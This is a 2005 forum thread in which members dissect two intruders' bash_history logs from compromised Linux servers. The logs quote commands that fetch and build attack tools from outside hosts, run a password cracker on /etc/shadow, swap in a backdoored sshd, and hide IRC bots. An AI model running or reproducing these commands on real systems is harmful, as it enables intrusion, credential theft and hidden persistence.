-
August 30th, 2005, 12:36 AM
#1
THIS is how you hack a web server!
From: steve@example.org
To: incidents@securityfocus.com
Subject: SSH compiled with backdoor
Hi!
One of my web servers was hacked on July 17, 2005. bash_history
showed:
w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot
According to john, a couple of users had weak passwords, but root
seemed well protected. From looking in all the bash_history, it appears the
hacker came in from the website account, and did an su from there.
I found this about a month later when I logged into the box, did an ls,
only to be met by a seg fault. A ps x showed mech.tgz trying to be
downloaded, and a bunch of other CRON processes running. The auth log
didn't show other logins, though, so the ssh installed must have logging
turned off for the backdoor they installed.
I filled out an abuse form at geocities for the accounts hosting the
software after downloading the software (I couldn't find the tgz files on
my system).
Last showed:
reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15
(37+11:47)
website pts/0 193.231.77.74 Sun Jul 17 17:42 - down
(00:27)
website pts/1 193.231.77.74 Sun Jul 17 17:05 - 17:26
(00:20)
website pts/0 211.43.207.169 Sun Jul 17 16:26 - 17:41
(01:14)
whois says:
inetnum: 193.231.77.0 - 193.231.77.255
netname: DATANET-RO
descr: Starnets - Datanet
country: RO
address: DATA NET
address: Str. Ioan N. Roman Nr. 13
address: Constanta, cod 900199, ROMANIA
Best Regards,
Steve
----------------
-
August 30th, 2005, 01:03 AM
#2
**** forgot something:
I posted this because I thought it was very interesting and it showed a common way to hack a computer running a Unix OS.
w
The first command they ran was "w" which was probably to see who was online and if root was sitting at the console or not and OF COURSE check the uptime maybe to take a guess as to when the last reboot was. This helps find an exploit that the machine may not have installed. Though this tech works better on Windows where EVERY patch needs a reboot.
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
They used wget to grab a file on their own website which was a hacked version of a common application used by admin.
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow
They remove the downloaded file so the admin doesn't find.
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
Editing the header file.
cd ../..
./configure --without-x
make
make install
Installing the backdoored app.
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
Removing the actual applications to make room for their hacked copy.
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
A mild **** up
w
Check if anyone is going to notice a reboot
reboot
Pow.
-
August 30th, 2005, 01:28 AM
#3
Tight. And it shows it wasn't a script that did this...or if it was, it was interupted and manually completed. I wonder how long that took to do? Reading through it, I feel a sense of urgency for the punk. Not that it matters, really. I don't know about you guys, but if I am so paranoid that I have to run w every few minutes to see whose doing what, I need a beer, a valium, and a new line of work.
"Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
"...people find it far easier to forgive others for being wrong than being right." - Albus Percival Wulfric Brian Dumbledore
-
August 30th, 2005, 01:36 AM
#4
Yah, looks a bit paranoid, but if you're stealin, you keep looking over your shoulder to see if anyone's watching you. That's how they catch shoplifters in retail. Gotta admit the kid's good, but only if the dl'd file is untraceable (did he goto the library or school computer lab to upload it the first time out?). Else with enough log checking and cooperation he can be found.
Even a broken watch is correct twice a day.
Which coder said that nobody could outcode Microsoft in their own OS? Write a bit and make a fortune!
-
August 30th, 2005, 02:04 AM
#5
Yah, looks a bit paranoid, but if you're stealin, you keep looking over your shoulder to see if anyone's watching you.
I'm such an arrogant egotistical cocky self centered ****er!
Yeah, we really are 138.
-
August 30th, 2005, 03:10 AM
#6
LOL!
Does this face look almost mean?
-
August 30th, 2005, 03:29 AM
#7
Your face looks like... my ass.
Ermmm... goatse style.
Your a sexy man.
http://crime.about.com/od/history/qt...ords_gracy.htm
-
August 30th, 2005, 05:01 AM
#8
And yet they didn't sanitize the bash_history?
cheers,
catch
-
August 30th, 2005, 08:41 AM
#9
I had something allong these lines happen to a box of a friend.. Just a 'toy' linux box..
An ssh 'knocker' found a weak user (user: print, passwd: print (that's plain stupid))
A few minutes later came the 'hacker'
Or should I say lamer.. let's disect..
.bash_historychanged password
Code:
w
cd /var/tmp
ls
hostname -f
mkdir " "
cd " "
A nice hard to find folder
Code:
ls
pwd
wget esteticu.org/mremap_pte
chmod +x mremap_pte
./mremap_pte
old kernel exploit (ptrace) won't workDude.. you arn't root.. that won't work
Code:
ls
rm -rf hide
rm -rf hide.tgz
wget ideo.go.ro/psy6667.tgz
tar xzvf psy6667.tgz
rm -rf psy6667.tgz
cd psybnc
chmod +x psybnc
mv psybnc backup
PATH="./"
backup
ls
rm -rf backup
kilall -9 psybnc
rm -rf psybnc
exit
Ok.. so you installed a irc-bot as a 'normal' user behind a NAT (he could have known this won't work) while you have a valid login (with your own password)..
Code:
export PATH='.'
psybnc
ls
exit
Still won't work
Code:
export PATH='.'
crond
exit
I don't get it.. perhaps there is also a 'fake' crond exec in the psybnc package..typo
Code:
w
cd /var/tmp
ls
cd " "
ls
killall -9 psybnc
rm -rf psbnc
uname -a
Should have done that a bit earlier.. could have saved you some time
Code:
wget www.skimy.go.ro/psy.tgz
tar xzvf psy.tgz
cd psybnc
sh
ls
killall -9 psybnc
rm -rf psybnc
rm -rf backup
cd ..
ls
rm -rf psy.tgz
rm -rf psybnc
OK he found out such a bot won't work behind a NAT
Code:
wget artist.idilis.ro/xpl.tgz
tar xzvf xpl.tgz
rm -rf xpl.tgz
mv mech ".. .bot"
cd ".. .bot"
sh
And that's where the bot send enough mail to trigger the ISP to kill the connection :P
Leaving the poor 'hacker' disconnected and all the evidence of his mishaps there for us to look at...
ASCII stupid question, get a stupid ANSI.
When in Russia, pet a PETSCII.
Get your ass over to SLAYRadio the best station for C64 Remixes !
-
August 30th, 2005, 09:09 AM
#10
Very nice these disections ... I like 'em for seeing how they do it ... but then again if you get the logs and can see what they did, doesn't that mean they forgot to delete their evidence??.. Like catch said ! So that gets the discussion of how good they are or they just don't care maybe.
But off course if they did it from a public computer then would the evidence matter ?
Mmm wait it might if the place were the public computer stands keeps a record of who is using it (by means of driver license etc.. but these can be fake also)... just ranting, never mind
code:--------------------------------------------------------------------------------ww--------------------------------------------------------------------------------
I don't think it's a typo ...he got nervous and started to stotter
C.
Back when I was a boy, we carved our own IC's out of wood.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|